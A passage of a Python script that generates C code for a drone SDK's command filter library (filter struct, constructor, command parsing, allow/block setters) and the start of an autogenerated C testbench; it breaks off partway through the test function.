hfile.write (' * @brief Sets the filter behavior for all commands ' + get_ftr_old_name(ftr) + '.' + cl.name + '.XXX.\n')
hfile.write (' * @param filter The filter to be modified.\n')
hfile.write (' * @param behavior The behavior to use for the commands (must be either ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ' or ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ').\n')
hfile.write (' * @return An ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' enum.\n')
hfile.write (' */\n')
hfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior);\n')
hfile.write ('\n')
for cmd in cl.cmds:
hfile.write ('/**\n')
hfile.write (' * @brief Sets the filter behavior for the command ' + get_ftr_old_name(ftr) + '.' + cl.name + '.' + cmd.name + '.\n')
hfile.write (' * @param filter The filter to be modified.\n')
hfile.write (' * @param behavior The behavior to use for the command (must be either ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ' or ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ').\n')
hfile.write (' * @return An ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' enum.\n')
hfile.write (' */\n')
hfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior);\n')
hfile.write ('\n')
hfile.write ('\n')
else:
for cmd in ftr.cmds + ftr.evts:
hfile.write ('/**\n')
hfile.write (' * @brief Sets the filter behavior for the command ' + get_ftr_old_name(ftr) + '.' + cmd.name + '.\n')
hfile.write (' * @param filter The filter to be modified.\n')
hfile.write (' * @param behavior The behavior to use for the command (must be either ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + ' or ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ').\n')
hfile.write (' * @return An ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' enum.\n')
hfile.write (' */\n')
hfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cmd.name) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior);\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write ('#endif /* ' + COMMANDSFIL_DEFINE + ' */\n')
hfile.close ()
#################################
# 10TH PART : #
#################################
# Generate filter c file #
#################################
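# The filter implementation keeps one <FIL_STATUS_ENAME> field per command in
# struct ARCOMMANDS_Filter_t. NewFilter() checks that defaultBehavior is
# ALLOWED or BLOCKED and initializes every field with it; FilterCommand()
# reads the 8-bit feature id, 8-bit class id and 16-bit command id from the
# buffer and returns the stored behavior, UNKNOWN for unrecognized ids, or
# ERROR when the filter/buffer arguments are invalid.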
cfile = open (paths.COMMANDSFIL_CFILE, 'w')
cfile.write (LICENCE_HEADER)
cfile.write ('/********************************************\n')
cfile.write (' * AUTOGENERATED FILE *\n')
cfile.write (' * DO NOT MODIFY IT *\n')
cfile.write (' * *\n')
cfile.write (' * To add new commands : *\n')
cfile.write (' * - Modify ../Xml/commands.xml file *\n')
cfile.write (' * - Re-run generateCommandsList.py script *\n')
cfile.write (' * *\n')
cfile.write (' ********************************************/\n')
cfile.write ('#include <config.h>\n')
cfile.write ('#include <stdlib.h>\n')
cfile.write ('#include "' + COMMANDSRW_HFILE_NAME + '"\n')
cfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n')
cfile.write ('#include <' + COMMANDSFIL_HFILE_NAME + '>\n')
cfile.write ('#include <' + COMMANDSID_HFILE_NAME + '>\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write ('// ARCOMMANDS_Filter_t structure definition\n')
cfile.write ('struct ARCOMMANDS_Filter_t\n')
cfile.write ('{\n')
for ftr in allFeatures:
cfile.write (' // Feature ' + get_ftr_old_name(ftr) + '\n')
for cmd in ftr.cmds + ftr.evts:
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior;\n')
cfile.write ('\n')
cfile.write ('};\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write ('// Constructor\n')
cfile.write ('ARCOMMANDS_Filter_t* ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'NewFilter') + ' (' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' defaultBehavior, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' *error)\n')
cfile.write ('{\n')
cfile.write (' ARCOMMANDS_Filter_t *retFilter = NULL;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ';\n')
cfile.write (' if ((defaultBehavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ') &&\n')
cfile.write (' (defaultBehavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + '))\n')
cfile.write (' {\n')
cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_STATUS') + ';\n')
cfile.write (' } // No else : Args check\n')
cfile.write ('\n')
cfile.write (' if (localError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' retFilter = malloc (sizeof (struct ARCOMMANDS_Filter_t));\n')
cfile.write (' if (retFilter == NULL)\n')
cfile.write (' {\n')
cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'ALLOC') + ';\n')
cfile.write (' } // No else : Error processing.\n')
cfile.write (' } // No else : Processing block\n')
cfile.write ('\n')
cfile.write (' // Setup default behavior\n')
cfile.write (' if (localError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
for ftr in allFeatures:
cfile.write (' // Feature ' + get_ftr_old_name(ftr) + '\n')
for cmd in ftr.cmds + ftr.evts:
cfile.write (' retFilter->Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior = defaultBehavior;\n')
cfile.write (' } // No else : Processing block\n')
cfile.write ('\n')
cfile.write (' if (error != NULL)\n')
cfile.write (' {\n')
cfile.write (' *error = localError;\n')
cfile.write (' } // No else : Set error only if pointer is not NULL\n')
cfile.write (' return retFilter;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('void ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'DeleteFilter') + ' (ARCOMMANDS_Filter_t **filter)\n')
cfile.write ('{\n')
cfile.write (' if ((filter != NULL) &&\n')
cfile.write (' (*filter != NULL))\n')
cfile.write (' {\n')
cfile.write (' free (*filter);\n')
cfile.write (' *filter = NULL;\n')
cfile.write (' } // No else : No need to delete an invalid filter instance\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (ARCOMMANDS_Filter_t *filter, uint8_t *buffer, uint32_t len, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' *error)\n')
cfile.write ('{\n')
cfile.write (' ' + AREnumName (LIB_MODULE, ID_SUBMODULE, 'FEATURE') + ' commandFeature = -1;\n')
cfile.write (' int commandClass = -1;\n')
cfile.write (' int commandId = -1;\n')
cfile.write (' int32_t offset = 0;\n')
cfile.write (' int32_t readError = 0;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ';\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' retStatus = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'UNKNOWN') + ';\n')
cfile.write ('\n')
cfile.write (' // Args check\n')
cfile.write (' if (filter == NULL)\n')
cfile.write (' {\n')
cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_FILTER') + ';\n')
cfile.write (' } // No else : Args check\n')
cfile.write ('\n')
cfile.write (' if ((buffer == NULL) ||\n')
cfile.write (' (len < 4))\n')
cfile.write (' {\n')
cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_BUFFER') + ';\n')
cfile.write (' } // No else : Args check\n')
cfile.write ('\n')
cfile.write (' if (localError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandFeature = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, len, &offset, &readError);\n')
cfile.write (' if (readError == 1)\n')
cfile.write (' {\n')
cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_BUFFER') + ';\n')
cfile.write (' }\n')
cfile.write (' } // No else : Processing block\n')
cfile.write ('\n')
cfile.write (' if (localError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandClass = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, len, &offset, &readError);\n')
cfile.write (' if (readError == 1)\n')
cfile.write (' {\n')
cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_BUFFER') + ';\n')
cfile.write (' }\n')
cfile.write (' } // No else : Processing block\n')
cfile.write ('\n')
cfile.write (' if (localError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandId = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, len, &offset, &readError);\n')
cfile.write (' if (readError == 1)\n')
cfile.write (' {\n')
cfile.write (' localError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_BUFFER') + ';\n')
cfile.write (' }\n')
cfile.write (' } // No else : Processing block\n')
cfile.write ('\n')
cfile.write (' if (localError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' switch (commandFeature)\n')
cfile.write (' {\n')
for ftr in allFeatures:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ':\n')
cfile.write (' {\n')
if ftr.classes:
cfile.write (' switch (commandClass)\n')
cfile.write (' {\n')
for cl in ftr.classes:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cl.name) + ':\n')
cfile.write (' {\n')
cfile.write (' switch (commandId)\n')
cfile.write (' {\n')
for cmd in cl.cmds:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) + ':\n')
cfile.write (' {\n')
cfile.write (' retStatus = filter->Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Behavior;\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) + ' */\n')
cfile.write (' default:\n')
cfile.write (' // Do nothing, the default answer is already UNKNOWN\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cl.name) + ' */\n')
cfile.write (' default:\n')
cfile.write (' // Do nothing, the default answer is already UNKNOWN\n')
cfile.write (' break;\n')
cfile.write (' }\n')
else:
cfile.write (' if (commandClass == '+ARMacroName (LIB_MODULE, ID_SUBMODULE, 'FEATURE_CLASS')+')\n')
cfile.write (' {\n')
cfile.write (' switch (commandId)\n')
cfile.write (' {\n')
for cmd in ftr.cmds + ftr.evts:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CMD', cmd.name) + ':\n')
cfile.write (' {\n')
cfile.write (' retStatus = filter->Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cmd.name) + 'Behavior;\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CMD', cmd.name) + ' */\n')
cfile.write (' default:\n')
cfile.write (' // Do nothing, the default answer is already UNKNOWN\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' //Else Do nothing, the default answer is already UNKNOWN\n')
cfile.write (' }\n')
cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ' */\n')
cfile.write (' default:\n')
cfile.write (' // Do nothing, the default answer is already UNKNOWN\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' if (localError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' retStatus = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ERROR') + ';\n')
    cfile.write ('    } // No else : Keep retStatus if no error occurred\n')
cfile.write ('\n')
cfile.write (' if (error != NULL)\n')
cfile.write (' {\n')
cfile.write (' *error = localError;\n')
cfile.write (' } // No else : Set error only if pointer is not NULL\n')
cfile.write ('\n')
cfile.write (' return retStatus;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write ('// Filter ON/OFF functions')
cfile.write ('\n')
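    # One setter per feature (applies to all its commands), plus per-class setters
    # for class-based features and one setter per individual command.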
for ftr in allFeatures:
cfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n')
cfile.write ('\n')
cfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior)\n')
cfile.write ('{\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ';\n')
cfile.write ('\n')
cfile.write (' if (filter == NULL)\n')
cfile.write (' {\n')
cfile.write (' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_FILTER') + ';\n')
cfile.write (' } // No else : Args check\n')
cfile.write ('\n')
cfile.write (' if ((behavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ') &&\n')
cfile.write (' (behavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + '))\n')
cfile.write (' {\n')
cfile.write (' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_STATUS') + ';\n')
cfile.write (' } // No else : Arg check\n')
cfile.write ('\n')
cfile.write (' if (retError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
for cmd in ftr.cmds + ftr.evts:
cfile.write (' filter->Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior = behavior;\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' return retError;\n')
cfile.write ('}\n')
cfile.write ('\n')
if ftr.classes:#project only
for cl in ftr.classes:
cfile.write ('// Command class ' + cl.name + '\n')
cfile.write ('\n')
cfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior)\n')
cfile.write ('{\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ';\n')
cfile.write ('\n')
cfile.write (' if (filter == NULL)\n')
cfile.write (' {\n')
cfile.write (' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_FILTER') + ';\n')
cfile.write (' } // No else : Args check\n')
cfile.write ('\n')
cfile.write (' if ((behavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ') &&\n')
cfile.write (' (behavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + '))\n')
cfile.write (' {\n')
cfile.write (' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_STATUS') + ';\n')
cfile.write (' } // No else : Arg check\n')
cfile.write ('\n')
cfile.write (' if (retError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
for cmd in cl.cmds:
cfile.write (' filter->Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Behavior = behavior;\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' return retError;\n')
cfile.write ('}\n')
cfile.write ('\n')
for cmd in ftr.cmds + ftr.evts:
cfile.write (AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' ARCOMMANDS_Filter_Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior (ARCOMMANDS_Filter_t *filter, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' behavior)\n')
cfile.write ('{\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ';\n')
cfile.write (' if (filter == NULL)\n')
cfile.write (' {\n')
cfile.write (' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_FILTER') + ';\n')
cfile.write (' } // No else : Args check\n')
cfile.write ('\n')
cfile.write (' if ((behavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ') &&\n')
cfile.write (' (behavior != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'BLOCKED') + '))\n')
cfile.write (' {\n')
cfile.write (' retError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'BAD_STATUS') + ';\n')
cfile.write (' } // No else : Arg check\n')
cfile.write ('\n')
cfile.write (' if (retError == ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' filter->Cmd' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Behavior = behavior;\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' return retError;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write ('// END GENERATED CODE\n')
cfile.close ()
def tb_generateCmds(ctx, paths):
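    # Generates the C testbench: encodes every command with its sample arguments,
    # checks the filter behavior, then decodes the buffer back through the callbacks.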
genDebug = True
genTreeFilename = None
projects = [DEFAULTPROJECTNAME]
if not os.path.exists (paths.TB__DIR):
os.makedirs (paths.TB__DIR)
if not os.path.exists (paths.LIN_TB_DIR):
os.makedirs (paths.LIN_TB_DIR)
if not os.path.exists (paths.COM_TB_DIR):
os.makedirs (paths.COM_TB_DIR)
allFeatures = ctx.features
# Check types used
for ftr in allFeatures:
for msg in ftr.getMsgs():
for arg in msg.args:
if isinstance(arg.argType, ArEnum):
hasArgOfType[ArArgType.ENUM] = True
elif isinstance(arg.argType, ArBitfield):
hasArgOfType[ArArgType.BITFIELD] = True
hasArgOfType[arg.argType.btfType] = True
else:
hasArgOfType[arg.argType] = True
#################################
# 11TH PART : #
#################################
# Generate C Testbench #
#################################
def TB_CALL_VARNAME (ftr, cmd):
return get_ftr_old_name(ftr) + ARCapitalize (format_cmd_name(cmd)) + 'ShouldBeCalled'
def TB_CREATE_VARNAME (ftr, cmd):
return 'int ' + TB_CALL_VARNAME (ftr, cmd) + ' = 0;'
cfile = open (paths.TB_CFILE, 'w')
cfile.write (LICENCE_HEADER)
cfile.write ('/********************************************\n')
cfile.write (' * AUTOGENERATED FILE *\n')
cfile.write (' * DO NOT MODIFY IT *\n')
cfile.write (' * *\n')
cfile.write (' * To add new commands : *\n')
cfile.write (' * - Modify ../Xml/commands.xml file *\n')
cfile.write (' * - Re-run generateCommandsList.py script *\n')
cfile.write (' * *\n')
cfile.write (' ********************************************/\n')
cfile.write ('#include <' + COMMANDSGEN_HFILE_NAME + '>\n')
cfile.write ('#include <' + COMMANDSDEC_HFILE_NAME + '>\n')
cfile.write ('#include <' + COMMANDSFIL_HFILE_NAME + '>\n')
cfile.write ('#include <libARSAL/ARSAL_Print.h>\n')
cfile.write ('#include <stdlib.h>\n')
cfile.write ('#include <string.h>\n')
cfile.write ('\n')
cfile.write ('int errcount;\n')
cfile.write ('char describeBuffer [1024] = {0};\n')
cfile.write ('\n')
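    # One 'ShouldBeCalled' flag per command, used by the callbacks to detect unexpected calls.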
for ftr in allFeatures:
for msg in ftr.cmds + ftr.evts:
cfile.write (TB_CREATE_VARNAME (ftr, msg) + '\n')
cfile.write ('\n')
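    # One callback per command: logs the received arguments and compares them to the XML sample values.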
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
cmdNamePrint = cmd.name if cmd.cls is None else cmd.cls.name + '.' + cmd.name
cfile.write ('void ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ' (')
first = True
for arg in cmd.args:
if first:
first = False
else:
cfile.write (', ')
cfile.write (xmlToC (LIB_MODULE, ftr, cmd, arg, True) + ' ' + arg.name)
if not first:
cfile.write (', ')
cfile.write ('void *custom)\n')
cfile.write ('{\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_WARNING, "' + TB_TAG + '", "Callback for command ' + get_ftr_old_name(ftr) + '.' + cmdNamePrint + ' --> Custom PTR = %p", custom);\n')
for arg in cmd.args:
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_WARNING, "' + TB_TAG + '", "' + arg.name + ' value : <' + xmlToPrintf (ftr, cmd, arg) + '>", ' + arg.name + ');\n')
if ArArgType.STRING == arg.argType:
cfile.write (' if (strcmp (' + xmlToSample (ftr, cmd, arg) + ', ' + arg.name + ') != 0)\n')
else:
cfile.write (' if (' + arg.name + ' != ' + xmlToSample (ftr, cmd, arg) + ')\n')
cfile.write (' {\n')
if ArArgType.STRING == arg.argType:
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "BAD ARG VALUE !!! --> Expected <%s>", ' + xmlToSample (ftr, cmd, arg) + ');\n')
else:
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "BAD ARG VALUE !!! --> Expected <' + xmlToSample (ftr, cmd, arg) + '>");\n')
cfile.write (' errcount++ ;\n')
cfile.write (' }\n')
cfile.write (' if (' + TB_CALL_VARNAME (ftr, cmd) + ' == 0)\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "BAD CALLBACK !!! --> This callback should not have been called for this command");\n')
cfile.write (' errcount++ ;\n')
cfile.write (' }\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write ('\n')
cfile.write ('void ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'initCb') + ' (void)\n')
cfile.write ('{\n')
cfile.write (' intptr_t cbCustom = 0;\n')
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
cfile.write (' ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' ((' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ') ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ', (void *)cbCustom++ );\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('\n')
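    # filterTest: creates a filter with a default behavior, checks that FilterCommand
    # returns it, then flips the behavior through the given setter and checks again.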
cfile.write ('int ' + ARFunctionName (LIB_MODULE, TB_SUBMODULE, 'filterTest') + ' (uint8_t *buffer, uint32_t size, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' (*setter)(ARCOMMANDS_Filter_t *, ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + '))\n')
cfile.write ('{\n')
cfile.write (' int errors = 0;\n')
cfile.write (' ARCOMMANDS_Filter_t *testFilter = NULL;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + ' filterError = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ';\n')
cfile.write (' ' + AREnumName (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + ' filterStatus = ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'UNKNOWN') + ';\n')
cfile.write (' // Default allow, set to block after\n')
cfile.write (' testFilter = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'NewFilter') + ' (' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ', &filterError);\n')
cfile.write (' if (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' ARSAL_PRINT (ARSAL_PRINT_ERROR, "' + TB_TAG + '", "Error while creating allow filter : %d", filterError);\n')
cfile.write (' errors++;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' filterStatus = ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' (testFilter, buffer, size, &filterError);\n')
cfile.write (' if ((filterStatus != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME, 'ALLOWED') + ') ||\n')
cfile.write (' (filterError != ' + AREnumValue (LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME, 'OK') + '))\n')
cfile.write (' {\n')
